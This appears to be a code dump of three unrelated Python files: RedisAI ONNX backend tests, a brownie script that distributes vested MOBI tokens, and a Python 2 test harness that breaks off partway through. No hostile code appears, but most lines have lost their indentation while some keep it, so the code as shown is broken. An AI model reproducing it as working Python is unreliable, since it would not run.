def test_onnx_modelrun_batchdim_mismatch(env):
if not TEST_ONNX:
env.debugPrint("skipping {} since TEST_ONNX=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
model_pb = load_file_content('batchdim_mismatch.onnx')
ret = con.execute_command('AI.MODELSTORE', 'm{1}', 'ONNX', DEVICE, 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
con.execute_command('AI.TENSORSET', 'a{1}', 'FLOAT', 3, 'VALUES', 1, 1, 1)
con.execute_command('AI.TENSORSET', 'b{1}', 'FLOAT', 2, 'VALUES', 1, 1)
check_error_message(env, con, "Got invalid dimensions for input: 0 for the following indices index: 0 Got: 3"
" Expected: 2 Please fix either the inputs or the model.",
'AI.MODELEXECUTE', 'm{1}', 'INPUTS', 2, 'a{1}', 'b{1}', 'OUTPUTS', 2, 'c{1}', 'd{1}')
def test_onnx_modelrun_mnist_autobatch(env):
if not TEST_ONNX:
return
con = get_connection(env, '{1}')
model_pb = load_file_content('mnist_batched.onnx')
sample_raw = load_file_content('one.raw')
ret = con.execute_command('AI.MODELSTORE', 'm{1}', 'ONNX', 'CPU',
'BATCHSIZE', 2, 'MINBATCHSIZE', 2, 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ret = con.execute_command('AI.MODELGET', 'm{1}', 'META')
env.assertEqual(len(ret), 16)
# TODO: enable me. CI is having issues on GPU asserts of ONNX and CPU
if DEVICE == "CPU":
env.assertEqual(ret[1], b'ONNX')
env.assertEqual(ret[3], b'CPU')
env.assertEqual(ret[5], b'')
env.assertEqual(ret[7], 2)
env.assertEqual(ret[9], 2)
env.assertEqual(len(ret[11]), 1)
env.assertEqual(len(ret[13]), 1)
env.assertEqual(ret[15], 0)
con.execute_command('AI.TENSORSET', 'a{1}', 'FLOAT', 1, 1, 28, 28, 'BLOB', sample_raw)
con.execute_command('AI.TENSORSET', 'c{1}', 'FLOAT', 1, 1, 28, 28, 'BLOB', sample_raw)
ensureSlaveSynced(con, env)
def run():
con = get_connection(env, '{1}')
con.execute_command('AI.MODELEXECUTE', 'm{1}', 'INPUTS', 1, 'c{1}', 'OUTPUTS', 1, 'd{1}')
t = threading.Thread(target=run)
t.start()
con.execute_command('AI.MODELEXECUTE', 'm{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 1, 'b{1}')
t.join()
ensureSlaveSynced(con, env)
    time.sleep(1)
values = con.execute_command('AI.TENSORGET', 'b{1}', 'VALUES')
argmax = max(range(len(values)), key=lambda i: values[i])
env.assertEqual(argmax, 1)
values = con.execute_command('AI.TENSORGET', 'd{1}', 'VALUES')
argmax = max(range(len(values)), key=lambda i: values[i])
env.assertEqual(argmax, 1)
def test_onnx_modelrun_iris(env):
if not TEST_ONNX:
env.debugPrint("skipping {} since TEST_ONNX=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
linear_model = load_file_content('linear_iris.onnx')
logreg_model = load_file_content('logreg_iris.onnx')
ret = con.execute_command('AI.MODELSTORE', 'linear{1}', 'ONNX', DEVICE, 'BLOB', linear_model)
env.assertEqual(ret, b'OK')
ret = con.execute_command('AI.MODELSTORE', 'logreg{1}', 'ONNX', DEVICE, 'BLOB', logreg_model)
env.assertEqual(ret, b'OK')
con.execute_command('AI.TENSORSET', 'features{1}', 'FLOAT', 1, 4, 'VALUES', 5.1, 3.5, 1.4, 0.2)
ensureSlaveSynced(con, env)
con.execute_command('AI.MODELEXECUTE', 'linear{1}', 'INPUTS', 1, 'features{1}', 'OUTPUTS', 1, 'linear_out{1}')
con.execute_command('AI.MODELEXECUTE', 'logreg{1}', 'INPUTS', 1, 'features{1}', 'OUTPUTS', 2, 'logreg_out{1}', 'logreg_probs{1}')
ensureSlaveSynced(con, env)
linear_out = con.execute_command('AI.TENSORGET', 'linear_out{1}', 'VALUES')
logreg_out = con.execute_command('AI.TENSORGET', 'logreg_out{1}', 'VALUES')
env.assertEqual(float(linear_out[0]), -0.090524077415466309)
env.assertEqual(logreg_out[0], 0)
if env.useSlaves:
con2 = env.getSlaveConnection()
linear_out2 = con2.execute_command('AI.TENSORGET', 'linear_out{1}', 'VALUES')
logreg_out2 = con2.execute_command('AI.TENSORGET', 'logreg_out{1}', 'VALUES')
env.assertEqual(linear_out, linear_out2)
env.assertEqual(logreg_out, logreg_out2)
def test_onnx_modelinfo(env):
if not TEST_ONNX:
env.debugPrint("skipping {} since TEST_ONNX=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
linear_model = load_file_content('linear_iris.onnx')
ret = con.execute_command('AI.MODELSTORE', 'linear{1}', 'ONNX', DEVICE, 'BLOB', linear_model)
env.assertEqual(ret, b'OK')
model_serialized_master = con.execute_command('AI.MODELGET', 'linear{1}', 'META')
con.execute_command('AI.TENSORSET', 'features{1}', 'FLOAT', 1, 4, 'VALUES', 5.1, 3.5, 1.4, 0.2)
ensureSlaveSynced(con, env)
if env.useSlaves:
con2 = env.getSlaveConnection()
model_serialized_slave = con2.execute_command('AI.MODELGET', 'linear{1}', 'META')
env.assertEqual(len(model_serialized_master), len(model_serialized_slave))
previous_duration = 0
for call in range(1, 10):
res = con.execute_command('AI.MODELEXECUTE', 'linear{1}', 'INPUTS', 1, 'features{1}', 'OUTPUTS', 1, 'linear_out{1}')
env.assertEqual(res, b'OK')
ensureSlaveSynced(con, env)
info = con.execute_command('AI.INFO', 'linear{1}')
info_dict_0 = info_to_dict(info)
env.assertEqual(info_dict_0['key'], 'linear{1}')
env.assertEqual(info_dict_0['type'], 'MODEL')
env.assertEqual(info_dict_0['backend'], 'ONNX')
env.assertEqual(info_dict_0['device'], DEVICE)
env.assertTrue(info_dict_0['duration'] > previous_duration)
env.assertEqual(info_dict_0['samples'], call)
env.assertEqual(info_dict_0['calls'], call)
env.assertEqual(info_dict_0['errors'], 0)
previous_duration = info_dict_0['duration']
res = con.execute_command('AI.INFO', 'linear{1}', 'RESETSTAT')
env.assertEqual(res, b'OK')
info = con.execute_command('AI.INFO', 'linear{1}')
info_dict_0 = info_to_dict(info)
env.assertEqual(info_dict_0['duration'], 0)
env.assertEqual(info_dict_0['samples'], 0)
env.assertEqual(info_dict_0['calls'], 0)
env.assertEqual(info_dict_0['errors'], 0)
def test_onnx_modelrun_disconnect(env):
if not TEST_ONNX:
env.debugPrint("skipping {} since TEST_ONNX=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
linear_model = load_file_content('linear_iris.onnx')
ret = con.execute_command('AI.MODELSTORE', 'linear{1}', 'ONNX', DEVICE, 'BLOB', linear_model)
env.assertEqual(ret, b'OK')
model_serialized_master = con.execute_command('AI.MODELGET', 'linear{1}', 'META')
con.execute_command('AI.TENSORSET', 'features{1}', 'FLOAT', 1, 4, 'VALUES', 5.1, 3.5, 1.4, 0.2)
ensureSlaveSynced(con, env)
if env.useSlaves:
con2 = env.getSlaveConnection()
model_serialized_slave = con2.execute_command('AI.MODELGET', 'linear{1}', 'META')
env.assertEqual(len(model_serialized_master), len(model_serialized_slave))
ret = send_and_disconnect(('AI.MODELEXECUTE', 'linear{1}', 'INPUTS', 1, 'features{1}', 'OUTPUTS', 1, 'linear_out{1}'), con)
env.assertEqual(ret, None)
def tests_onnx_info(env):
if not TEST_ONNX:
env.debugPrint("skipping {} since TEST_ONNX=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
backends_info = get_info_section(con, 'backends_info')
env.assertFalse('ai_onnxruntime_version' in backends_info)
linear_model = load_file_content('linear_iris.onnx')
con.execute_command('AI.MODELSTORE', 'linear{1}', 'ONNX', DEVICE, 'BLOB', linear_model)
backends_info = get_info_section(con, 'backends_info')
env.assertTrue('ai_onnxruntime_version' in backends_info)
def test_parallelism():
env = Env(moduleArgs='INTRA_OP_PARALLELISM 1 INTER_OP_PARALLELISM 1')
if not TEST_ONNX:
env.debugPrint("skipping {} since TEST_ONNX=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
model_pb = load_file_content('mnist.onnx')
sample_raw = load_file_content('one.raw')
ret = con.execute_command('AI.MODELSTORE', 'm{1}', 'ONNX', DEVICE, 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
con.execute_command('AI.TENSORSET', 'a{1}', 'FLOAT', 1, 1, 28, 28, 'BLOB', sample_raw)
con.execute_command('AI.MODELEXECUTE', 'm{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 1, 'b{1}')
ensureSlaveSynced(con, env)
values = con.execute_command('AI.TENSORGET', 'b{1}', 'VALUES')
argmax = max(range(len(values)), key=lambda i: values[i])
env.assertEqual(argmax, 1)
load_time_config = get_info_section(con, 'load_time_configs')
env.assertEqual(load_time_config["ai_inter_op_parallelism"], "1")
env.assertEqual(load_time_config["ai_intra_op_parallelism"], "1")
    env = Env(moduleArgs='INTRA_OP_PARALLELISM 2 INTER_OP_PARALLELISM 2')
    con = get_connection(env, '{1}')
    load_time_config = get_info_section(con, 'load_time_configs')
env.assertEqual(load_time_config["ai_inter_op_parallelism"], "2")
env.assertEqual(load_time_config["ai_intra_op_parallelism"], "2")
class TestOnnxCustomAllocator:
def __init__(self):
self.env = Env()
if not TEST_ONNX:
self.env.debugPrint("skipping {} since TEST_ONNX=0".format(sys._getframe().f_code.co_name), force=True)
return
self.allocator_access_counter = 0
def test_1_cpu_allocator(self):
con = get_connection(self.env, '{1}')
model_pb = load_file_content('mul_1.onnx')
        # Expect the allocator to be used during model set for allocating the model, its input name and its
        # output name: 3 allocations overall. The model raw size is 24B, and the names are 2B each. In practice
        # we allocate more than 28B, as the Redis allocator uses additional memory for its internal management
        # and for the 64-byte alignment. When the test runs with valgrind, Redis uses malloc for the
        # allocations (and hence does not use the additional memory).
ret = con.execute_command('AI.MODELSTORE', 'm{1}', 'ONNX', 'CPU', 'BLOB', model_pb)
self.env.assertEqual(ret, b'OK')
self.allocator_access_counter += 3
backends_info = get_info_section(con, 'backends_info')
# Expect using at least 24+63+(size of an address) + 2*(2+63+(size of an address)) (=241) bytes.
model_allocation_bytes_used = int(backends_info["ai_onnxruntime_memory"])
self.env.assertTrue(model_allocation_bytes_used >= 241)
self.env.assertEqual(int(backends_info["ai_onnxruntime_memory_access_num"]), self.allocator_access_counter)
con.execute_command('AI.TENSORSET', 'a_mul{1}', 'FLOAT', 3, 2, 'VALUES', 1.0, 2.0, 3.0, 4.0, 5.0, 6.0)
# Running the model should access the allocator 6 times: allocating+freeing input+output names,
# and allocating+freeing the output as OrtValue. Overall, there should be no change in the memory consumption.
con.execute_command('AI.MODELEXECUTE', 'm{1}', 'INPUTS', 1, 'a_mul{1}', 'OUTPUTS', 1, 'b{1}')
self.allocator_access_counter += 6
values = con.execute_command('AI.TENSORGET', 'b{1}', 'VALUES')
self.env.assertEqual(values, [b'1', b'4', b'9', b'16', b'25', b'36'])
backends_info = get_info_section(con, 'backends_info')
self.env.assertEqual(int(backends_info["ai_onnxruntime_memory_access_num"]), self.allocator_access_counter)
self.env.assertEqual(int(backends_info["ai_onnxruntime_memory"]), model_allocation_bytes_used)
# Expect using the allocator free function 3 times: when releasing the model, input name and output name.
con.execute_command('AI.MODELDEL', 'm{1}')
self.allocator_access_counter += 3
self.env.assertFalse(con.execute_command('EXISTS', 'm{1}'))
backends_info = get_info_section(con, 'backends_info')
self.env.assertEqual(int(backends_info["ai_onnxruntime_memory"]), 0)
self.env.assertEqual(int(backends_info["ai_onnxruntime_memory_access_num"]), self.allocator_access_counter)
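    # A minimal illustrative helper (hypothetical, not called by the tests): it reproduces the 241-byte lower
    # bound asserted above, assuming a 64-bit build (8-byte addresses) and the 64-byte alignment padding
    # described in the comments of test_1_cpu_allocator.
    @staticmethod
    def _expected_min_allocation_bytes(model_size=24, name_sizes=(2, 2), ptr_size=8, align_pad=63):
        return (model_size + align_pad + ptr_size) + sum(n + align_pad + ptr_size for n in name_sizes)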
def test_2_with_gpu(self):
if DEVICE == 'CPU':
self.env.debugPrint("skipping {} since this test if for GPU only".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(self.env, '{1}')
model_pb = load_file_content('mul_1.onnx')
# for GPU, expect using the allocator only for allocating input and output names (not the model itself).
ret = con.execute_command('AI.MODELSTORE', 'm_gpu{1}', 'ONNX', DEVICE, 'BLOB', model_pb)
self.env.assertEqual(ret, b'OK')
self.allocator_access_counter += 2
        # Expect using more than 2*(2+63+(size of an address)) (=146) bytes by the Redis allocator, but no more
        # than 240, as the model weights shouldn't be allocated by the allocator.
backends_info = get_info_section(con, 'backends_info')
model_allocation_bytes_used = int(backends_info["ai_onnxruntime_memory"])
self.env.assertTrue(model_allocation_bytes_used > 146)
self.env.assertTrue(model_allocation_bytes_used < 241)
self.env.assertEqual(int(backends_info["ai_onnxruntime_memory_access_num"]), self.allocator_access_counter)
# Make sure that allocator is not used for running and freeing the GPU model, except for
# the input and output names allocations (and deallocations).
con.execute_command('AI.TENSORSET', 'a{1}', 'FLOAT', 3, 2, 'VALUES', 1.0, 2.0, 3.0, 4.0, 5.0, 6.0)
con.execute_command('AI.MODELEXECUTE', 'm_gpu{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 1, 'b{1}')
self.allocator_access_counter += 4
values = con.execute_command('AI.TENSORGET', 'b{1}', 'VALUES')
self.env.assertEqual(values, [b'1', b'4', b'9', b'16', b'25', b'36'])
# Expect that memory usage didn't change, and for another 4 accesses to the allocator (input and output names
# allocation and free)
backends_info = get_info_section(con, 'backends_info')
self.env.assertEqual(int(backends_info["ai_onnxruntime_memory"]), model_allocation_bytes_used)
self.env.assertEqual(int(backends_info["ai_onnxruntime_memory_access_num"]), self.allocator_access_counter)
# Expect only 2 more accesses in delete - for deallocating input and output names
con.execute_command('AI.MODELDEL', 'm_gpu{1}')
self.allocator_access_counter += 2
self.env.assertFalse(con.execute_command('EXISTS', 'm_gpu{1}'))
backends_info = get_info_section(con, 'backends_info')
self.env.assertEqual(int(backends_info["ai_onnxruntime_memory"]), 0)
self.env.assertEqual(int(backends_info["ai_onnxruntime_memory_access_num"]), self.allocator_access_counter)
def test_3_memory_limit(self):
self.env = Env(moduleArgs='THREADS_PER_QUEUE 8 BACKEND_MEMORY_LIMIT 1')
self.allocator_access_counter = 0
con = get_connection(self.env, '{1}')
# Try to allocate a model whose size exceeds the memory limit
inception_pb = load_file_content('inception-v2-9.onnx')
check_error_message(self.env, con, "Exception during initialization: Onnxruntime memory limit exceeded,"
" memory allocation failed.",
'AI.MODELSTORE', 'inception{1}', 'ONNX', 'CPU', 'BLOB', inception_pb)
mnist_pb = load_file_content('mnist.onnx')
sample_raw = load_file_content('one.raw')
# Create 25 different sessions of mnist model, the size of each session in onnx is ~31KB, overall ~770KB
for i in range(25):
ret = con.execute_command('AI.MODELSTORE', 'mnist_'+str(i)+'{1}', 'ONNX', 'CPU', 'BLOB', mnist_pb)
self.env.assertEqual(ret, b'OK')
con.execute_command('AI.TENSORSET', 'a{1}', 'FLOAT', 1, 1, 28, 28, 'BLOB', sample_raw)
        # As onnx memory consumption is about 0.77MB at this point, and executing an mnist session requires an
        # additional ~500KB of memory, we expect to exceed the memory limit here in some operation. Note that the
        # exact memory consumption changes depending on whether we are using the libc allocator or jemalloc
        # (jemalloc will be greater).
check_error_message(self.env, con, "Onnxruntime memory limit exceeded, memory allocation failed.",
'AI.MODELEXECUTE', 'mnist_0{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 1, 'b{1}',
error_msg_is_substr=True)
def run_parallel_onnx_sessions(con):
check_error_message(self.env, con, "Onnxruntime memory limit exceeded, memory allocation failed.",
'AI.MODELEXECUTE', 'mnist_0{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 1, 'b{1}',
error_msg_is_substr=True)
        # We run the sessions in parallel; all of them should fail.
run_test_multiproc(self.env, '{1}', 50, run_parallel_onnx_sessions)
class TestOnnxKillSwitch:
def __init__(self):
self.threads_per_queue = 8
self.env = Env(moduleArgs='THREADS_PER_QUEUE '+str(self.threads_per_queue)+' MODEL_EXECUTION_TIMEOUT 1000')
con = get_connection(self.env, '{1}')
model_with_inf_loop = load_file_content("model_with_infinite_loop.onnx")
ret = con.execute_command('AI.MODELSTORE', 'inf_loop_model{1}', 'ONNX', DEVICE, 'BLOB', model_with_inf_loop)
self.env.assertEqual(ret, b'OK')
        # Set tensors according to the model inputs. This model consists of two operations of type 'Identity'
        # (i.e., they just output the input), where the second op is wrapped with another op of type 'Loop'.
        # Overall, this model runs a very large number of iterations without doing anything, until it is caught
        # by the kill switch.
con.execute_command('AI.TENSORSET', 'iterations{1}', 'INT64', 1, 'VALUES', 9223372036854775807)
con.execute_command('AI.TENSORSET', 'loop_cond{1}', 'BOOL', 1, 'VALUES', 1)
con.execute_command('AI.TENSORSET', 'loop_input{1}', 'FLOAT', 1, 'VALUES', 42)
con.execute_command('AI.TENSORSET', 'outer_scope_input{1}', 'FLOAT', 1, 'VALUES', 42)
def test_basic(self):
con = get_connection(self.env, '{1}')
check_error_message(self.env, con, "Exiting due to terminate flag being set to true",
'AI.MODELEXECUTE', 'inf_loop_model{1}', 'INPUTS', 4, 'outer_scope_input{1}', 'iterations{1}',
'loop_cond{1}', 'loop_input{1}', 'OUTPUTS', 2, 'outer_scope_output{1}', 'loop_output{1}',
error_msg_is_substr=True)
def test_multiple_working_threads(self):
con = get_connection(self.env, '{1}')
# Load another onnx model that will be executed on the same threads that use the kill switch
model_pb = load_file_content('mnist.onnx')
sample_raw = load_file_content('one.raw')
ret = con.execute_command('AI.MODELSTORE', 'mnist{1}', 'ONNX', DEVICE, 'BLOB', model_pb)
self.env.assertEqual(ret, b'OK')
con.execute_command('AI.TENSORSET', 'a{1}', 'FLOAT', 1, 1, 28, 28, 'BLOB', sample_raw)
def run_parallel_onnx_sessions(con):
ret = con.execute_command('AI.MODELEXECUTE', 'mnist{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 1, 'b{1}')
self.env.assertEqual(ret, b'OK')
check_error_message(self.env, con, "Exiting due to terminate flag being set to true",
'AI.MODELEXECUTE', 'inf_loop_model{1}', 'INPUTS', 4, 'outer_scope_input{1}', 'iterations{1}',
'loop_cond{1}', 'loop_input{1}', 'OUTPUTS', 2, 'outer_scope_output{1}', 'loop_output{1}',
error_msg_is_substr=True)
ret = con.execute_command('AI.MODELEXECUTE', 'mnist{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 1, 'b{1}')
self.env.assertEqual(ret, b'OK')
run_test_multiproc(self.env, '{1}', 8, run_parallel_onnx_sessions)
def test_multiple_devices(self):
con = get_connection(self.env, '{1}')
        # The CPU run queue is created from the start, so if we use a device other than CPU, we should have
        # a maximum of 2*THREADS_PER_QUEUE run sessions; otherwise we should have THREADS_PER_QUEUE.
devices = {'CPU', DEVICE}
backends_info = get_info_section(con, 'backends_info')
self.env.assertEqual(backends_info['ai_onnxruntime_maximum_run_sessions_number'],
str(len(devices)*self.threads_per_queue))
        # Load another onnx model as if it runs on a different device (to test the existence of multiple queues,
        # and the extension of the global onnx run sessions array as a consequence).
model_pb = load_file_content('mnist.onnx')
ret = con.execute_command('AI.MODELSTORE', 'mnist_{1}', 'ONNX', 'CPU:1', 'BLOB', model_pb)
self.env.assertEqual(ret, b'OK')
devices.add('CPU:1')
backends_info = get_info_section(con, 'backends_info')
self.env.assertEqual(backends_info['ai_onnxruntime_maximum_run_sessions_number'],
str(len(devices)*self.threads_per_queue))
def test_forbidden_external_initializers(env):
if not TEST_ONNX:
env.debugPrint("skipping {} since TEST_ONNX=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
# move the external initializer to the redis' current dir (tests/flow/logs)
external_initializer_model = load_file_content("model_with_external_initializers.onnx")
shutil.copy(ROOT+"/tests/flow/test_data/Pads.bin", ROOT+"/tests/flow/logs")
check_error_message(env, con, "Initializer tensors with external data is not allowed.",
'AI.MODELSTORE', 'ext_initializers_model{1}', 'ONNX', DEVICE,
'BLOB', external_initializer_model)
os.remove(ROOT+"/tests/flow/logs/Pads.bin")
|
vest_lp_tokens.py
|
import json
import threading
from decimal import Decimal
from brownie import ERC20MOBI, VestingEscrow, accounts, history, network
from . import deployment_config as config
network.gas_limit(8000000)
TOTAL_AMOUNT = 5_000_000 * 10 ** 18
VESTING_PERIOD = 86400 * 7
# burn addresses / known scammers
BLACKLIST = [
"0x000000000000000000000000000000000000dead",
"0xe857656b7804ecc0d0d0fd643c6cfb69063a7d1a",
"0xbce6d09b800d0bc03f34ef93ed356519faec64d0",
"0xe4ffd96b5e6d2b6cdb91030c48cc932756c951b5",
]
def live():
"""
Vest tokens in a live environment.
* Apply web3 gas price strategy and middlewares
* Run main deployment and distribution logic
"""
admin, funding_admins = config.get_live_admin()
with open(config.DEPLOYMENTS_JSON) as fp:
deployments = json.load(fp)
vest_tokens(admin, funding_admins, deployments["ERC20MOBI"], config.REQUIRED_CONFIRMATIONS)
def development():
"""
Vest tokens in a development environment.
* Deploy the DAO token
* Run the main deployment and distribution logic
* Perform a sanity check to confirm balances and total supply are as expected
"""
token = ERC20MOBI.deploy("Mobius DAO Token", "MOBI", 18, {"from": accounts[0]})
vesting_escrow, vested_amounts = vest_tokens(accounts[0], accounts[1:5], token, 1)
sanity_check(vesting_escrow, vested_amounts)
logging_lock = threading.Lock()
logger_data = []
def _log_tx(**kwargs):
with logging_lock:
logger_data.append(kwargs)
with open("vesting-lp-log.json", "w") as fp:
json.dump(logger_data, fp)
def _fund_accounts(acct, vesting_escrow, fund_arguments, confs):
# called with 5 threads to fund recipients more efficiently
while fund_arguments:
try:
recipients, amounts = fund_arguments.pop()
except IndexError:
break
tx = vesting_escrow.fund(recipients, amounts, {"from": acct, "required_confs": 0})
_log_tx(
txid=tx.txid,
fn_name=tx.fn_name,
recipients=recipients,
amounts=amounts,
sender=acct.address,
)
tx.wait(confs)
def vest_tokens(admin, funding_admins, token_address, confs):
start_idx = len(history)
# get token Contract object
token = ERC20MOBI.at(token_address)
# deploy vesting contract
start_time = 1632004200 #1631916000 #1631883600 # token.future_epoch_time_write.call()
vesting_escrow = VestingEscrow.deploy(
token,
start_time,
start_time + VESTING_PERIOD,
False,
funding_admins,
{"from": admin, "required_confs": confs},
)
_log_tx(
txid=vesting_escrow.tx.txid,
fn_name="VestingEscrow.deploy",
contract_address=vesting_escrow.address,
)
# load vesting data from json
with open(config.LP_VESTING_JSON) as fp:
vested_pct = {k.lower(): Decimal(v) for k, v in json.load(fp).items()}
for addr in BLACKLIST:
if addr.lower() in vested_pct:
            del vested_pct[addr.lower()]
# calculate absolute amounts to be distributed
initial_total = sum(int(v * TOTAL_AMOUNT) for v in vested_pct.values())
adjustment_pct = Decimal(TOTAL_AMOUNT) / initial_total
vested_amounts = sorted(
([k, int(v * TOTAL_AMOUNT * adjustment_pct)] for k, v in vested_pct.items()),
key=lambda k: k[1],
reverse=True,
)
if vested_amounts[-1][1] < 0:
raise ValueError(f"'{config.LP_VESTING_JSON}' contains negative amounts!")
vested_amounts = [i for i in vested_amounts if i[1]]
    # floats -> int; we expect the total to be ever so slightly off, so let's fix that
final_total = sum(i[1] for i in vested_amounts)
if not 0 <= abs(final_total - TOTAL_AMOUNT) < len(vested_amounts):
print(final_total)
print(TOTAL_AMOUNT)
raise ValueError("Imprecision!!! Distribution amounts are too far off!")
for i in range(abs(final_total - TOTAL_AMOUNT)):
if final_total < TOTAL_AMOUNT:
vested_amounts[i][1] += 1
else:
vested_amounts[i][1] -= 1
tx = token.approve(vesting_escrow, TOTAL_AMOUNT, {"from": admin, "required_confs": confs})
_log_tx(txid=tx.txid, fn_name=tx.fn_name, spender=vesting_escrow.address, amount=TOTAL_AMOUNT)
tx = vesting_escrow.add_tokens(TOTAL_AMOUNT, {"from": admin, "required_confs": confs})
_log_tx(txid=tx.txid, fn_name=tx.fn_name, amount=TOTAL_AMOUNT)
# convert vested_amounts into input args for `VestingEscrow.fund` calls
fund_arguments = [
([x[0] for x in vested_amounts[i : i + 100]], [x[1] for x in vested_amounts[i : i + 100]])
for i in range(0, len(vested_amounts), 100)
]
# final call needs to be extended with zero values
zeros = 100 - len(fund_arguments[-1][0])
fund_arguments[-1] = (
fund_arguments[-1][0] + ["0x0000000000000000000000000000000000000000"] * zeros,
fund_arguments[-1][1] + [0] * zeros,
)
# use threading to handle the funding across several accounts
funding_threads = []
for acct in [admin] + funding_admins:
thread = threading.Thread(
target=_fund_accounts, args=(acct, vesting_escrow, fund_arguments, confs)
)
funding_threads.append(thread)
thread.start()
for thread in funding_threads:
thread.join()
# burn all the admin accounts!
tx = vesting_escrow.disable_fund_admins({"from": admin, "required_confs": confs})
_log_tx(txid=tx.txid, fn_name=tx.fn_name)
    tx = vesting_escrow.commit_transfer_ownership(
        "0x000000000000000000000000000000000000dead", {"from": admin, "required_confs": confs}
    )
    _log_tx(txid=tx.txid, fn_name=tx.fn_name)
    tx = vesting_escrow.apply_transfer_ownership({"from": admin, "required_confs": confs})
    _log_tx(txid=tx.txid, fn_name=tx.fn_name)
gas_used = sum(i.gas_used for i in history[start_idx:])
print(f"Distribution complete! Total gas used: {gas_used}")
# return the final vested amounts to be used in `sanity_check`, if desired
return vesting_escrow, vested_amounts
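# Minimal illustrative sketches (standalone, no brownie required; the helper names are hypothetical) of the two
# bits of arithmetic used in vest_tokens above: spreading the rounding drift left over after scaling the
# percentages to TOTAL_AMOUNT, and batching recipients into fixed-size `fund` calls padded with the zero address.
def _example_fix_rounding(amounts, target_total):
    """Spread the rounding difference one unit at a time over the largest recipients."""
    amounts = [list(i) for i in amounts]  # [[address, amount], ...], sorted largest first
    diff = sum(a[1] for a in amounts) - target_total
    step = -1 if diff > 0 else 1
    for i in range(abs(diff)):
        amounts[i][1] += step
    return amounts
def _example_batch(amounts, batch_size=100):
    """Split (address, amount) pairs into equal-size batches, padding the last one with zeros."""
    batches = [
        ([x[0] for x in amounts[i:i + batch_size]], [x[1] for x in amounts[i:i + batch_size]])
        for i in range(0, len(amounts), batch_size)
    ]
    pad = batch_size - len(batches[-1][0])
    batches[-1] = (
        batches[-1][0] + ["0x0000000000000000000000000000000000000000"] * pad,
        batches[-1][1] + [0] * pad,
    )
    return batches
assert sum(a[1] for a in _example_fix_rounding([["0xa", 40], ["0xb", 33], ["0xc", 30]], 100)) == 100
assert all(len(addrs) == 100 == len(amts) for addrs, amts in _example_batch([["0xa", 1]] * 250))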
def sanity_check(vesting_address, vested_amounts):
vesting_escrow = VestingEscrow.at(vesting_address)
if vesting_escrow.initial_locked_supply() != TOTAL_AMOUNT:
raise ValueError(f"Unexpected locked supply: {vesting_escrow.initial_locked_supply()}")
if vesting_escrow.unallocated_supply() != 0:
raise ValueError(f"Unallocated supply remains: {vesting_escrow.unallocated_supply()}")
for count, (acct, expected) in enumerate(vested_amounts, start=1):
balance = vesting_escrow.initial_locked(acct)
if balance != expected:
raise ValueError(
f"Incorrect vested amount for {acct} - expected {expected}, got {balance}"
)
if not count % 250:
print(f"{count}/{len(vested_amounts)} balances verified...")
print("Sanity check passed!")
|
testplus.py
|
#
# The contents of this file are subject to the Mozilla Public
# License Version 1.1 (the "License"); you may not use this file
# except in compliance with the License. You may obtain a copy of
# the License at http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS
# IS" basis, WITHOUT WARRANTY OF ANY KIND, either express or
# implied. See the License for the specific language governing
# rights and limitations under the License.
#
# The Original Code is "Java-Python Extension: testplus (JPE-testplus)".
#
# The Initial Developer of the Original Code is Frederic Bruno Giacometti.
# Portions created by Frederic Bruno Giacometti are
# Copyright (C) 2002 Frederic Bruno Giacometti. All Rights Reserved.
#
# Contributor: Frederic Giacometti, frederic.giacometti@arakne.com
#
from __future__ import nested_scopes
import re, sys, os, operator, types
def chdir(directory=None):
if directory is None:
if len(sys.argv):
directory = os.path.split(sys.argv[0])[0]
if len(directory):
os.chdir(directory)
def logfile():
global __logfile
try:
return __logfile
except NameError:
# add the regression directory to the path so that data files are
# found in the local directory
cwd = os.getcwd()
direc = os.path.split(sys.argv[0])[0]
if os.name == 'nt': #sys.platform == 'win32':
direc = direc.replace( '/', '\\')
if cwd[-len(direc):]!=direc:
d = os.path.join( os.getcwd(), os.path.split(sys.argv[0])[0] )
__logfile = open( sys.argv[ 0] + '.log', 'w')
else:
d = cwd
__logfile = open( os.path.split(sys.argv[0])[1] + '.log', 'w')
sys.path.append( d )
return __logfile
## connect, disconnect and fun are 3 tuple (fun, args, kw) OR just a function
class TestHarness:
def __init__( self,
name,
funs = [],
dependents = [],
connect = (lambda : None, (), {} ),
disconnect = (lambda : None, (), {} ) ):
self.name = name
self.funs = funs
self.dependents = dependents
self.connect = connect
self.disconnect = disconnect
self.count = 0
def __call__( self, fun):
try:
if type(fun)==types.TupleType:
func = fun[0]
args = fun[1]
kw = fun[2]
else:
func = fun
args = ()
kw = {}
apply( func, args, kw)
except:
return fun, sys.exc_info()
else:
return None
def __getattr__( self, attr):
if attr == 'failures':
result = filter( None, self.dependents)
if not result:
fail = self( self.connect )
if fail:
result = [fail]
else:
for fun in self.funs:
self.count += 1
testname = 'TEST%4i %s.%s ' % (self.count,
self.name,
fun.func_name)
if len(testname) < 70:
testname = testname + ' '*(65-len(testname))
print testname,
prevstdout = sys.stdout
#prevstderr = sys.stderr
sys.stdout = logfile() # sys.stderr = logfile()
try:
print testname
sys.stdout.flush()
res = self( fun)
result.append( res )
sys.stdout.flush()
finally:
sys.stdout = prevstdout
#sys.stderr = prevstderr
if res is None:
print 'PASSED'
else:
print 'FAILED'
result.append( self( self.disconnect))
result = filter( None, result)
else:
raise AttributeError( attr)
setattr( self, attr, result)
return result
def __len__( self):
return len( [x
for x in self.failures
